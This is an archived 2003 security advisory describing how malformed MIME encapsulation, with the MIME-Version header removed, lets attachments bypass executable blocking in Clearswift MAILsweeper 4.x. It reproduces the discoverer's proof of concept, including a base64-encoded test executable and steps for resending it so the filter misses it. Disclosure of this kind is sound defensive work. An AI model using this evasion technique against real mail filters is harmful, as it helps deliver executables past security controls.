Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.
A vulnerability exists in Clearswift’s MAILsweeper 4.x that could result in the bypass of the attachment blocking feature on the vulnerable server.
March 10, 2003
ReportedMarch 3, 2003, by Martin O’Neal.
VERSIONS AFFECTED
Clearswift MAILsweeper 4.x for Windows NT/2000
DESCRIPTION
A vulnerability exists in Clearswift’s MAILsweeper 4.x that could result in the bypass of the attachment blocking feature on the vulnerable server. If a deliberately malformed MIME encapsulation technique is used, then the MAILsweeper product will not recognize the attachment and allows it to pass.
DEMONSTRATION
The discover posted the following steps as proof of concept:
-- Proof of concept --
For this proof of concept, the MIME encapsulation is simply modified to
remove the MIME-Version header field. An example of an application that
will process a MIME construct that is malformed in this way is Microsoft Internet Explorer.
Whilst RFC2045 states that all agents must include this field [2] it
then goes on to say that "In the absence of a MIME-Version field, a
receiving mail user agent (whether conforming to MIME requirements or
not) may optionally choose to interpret the body of the message
according to local conventions."
Step 1: On the MAILsweeper host create a new Data Type Manager with only the Executable type selected. Save and restart the MAILsweeper Security service.
Step 2: Now create a text file that will be used to hold the MIME
encoded attachment. Start notepad (or another text editor), and paste
in:
MIME-Version: 1.0
Content-Location:file:///executable.exe
Content-Transfer-Encoding: base64
TVp0AQIAAAAgAAgA//8YAIAAAAAQAAIAHgAAAAEAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAC4AQCO2I0WAgC0Cc0huCBMzSFFeGUhJCQJALH/
/////wAAAAAAAFQBAAAAAAIAUkKL6IzABRAADh+jBAADB
gwAjsCLDgYAi/lPi/f986RQuDQAUMuMw4zYSI7YjsC/Dw
C5EACw//OuR4v3i8NIjsC/DwCxBIvG99DT6IzaK9BzBIz
YK9LT4APwjtqLx/fQ0+iMwivQcwSMwCvS0+AD+I7CrIrQ
Tq2LyEaKwiT+PLB1BazzqusGPLJ1bfOkisKoAXSxvjIBD
h+LHgQA/DPSrYvI4xOLwgPDjsCti/iD//90ESYBHeLzgf
oA8HQWgcIAEOvcjMBAjsCD7xAmAR1IjsDr4ovDiz4IAIs
2CgAD8AEGAgAtEACO2I7AuwAA+o7Wi+f7i8Uu/y+0QLsC
ALkWAIzKjtq6HAHNIbj/TM0hUGFja2VkIGZpbGUgaXMgY
29ycnVwdAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA=
Step 3: To reproduce this issue, send an email containing the attachment created in step 2 that will be processed by the scenario from step 1. This should result in a successful discovery condition.
Step 4: Reopen the attachment from step 2 and remove the first line
(MIME-Version: 1.0), then resend the attachment as per step 3. This
should result in the attachment not being spotted as an executable.
VENDOR RESPONSE
The vendor, Clearswift, has made an updated script utility available that can detect the malformed MIME header used in this vulnerability. As a workaround, this should be implemented until a fix or patch is available.
CREDIT
Discoveredby Martin O'Neal.
You May Also Like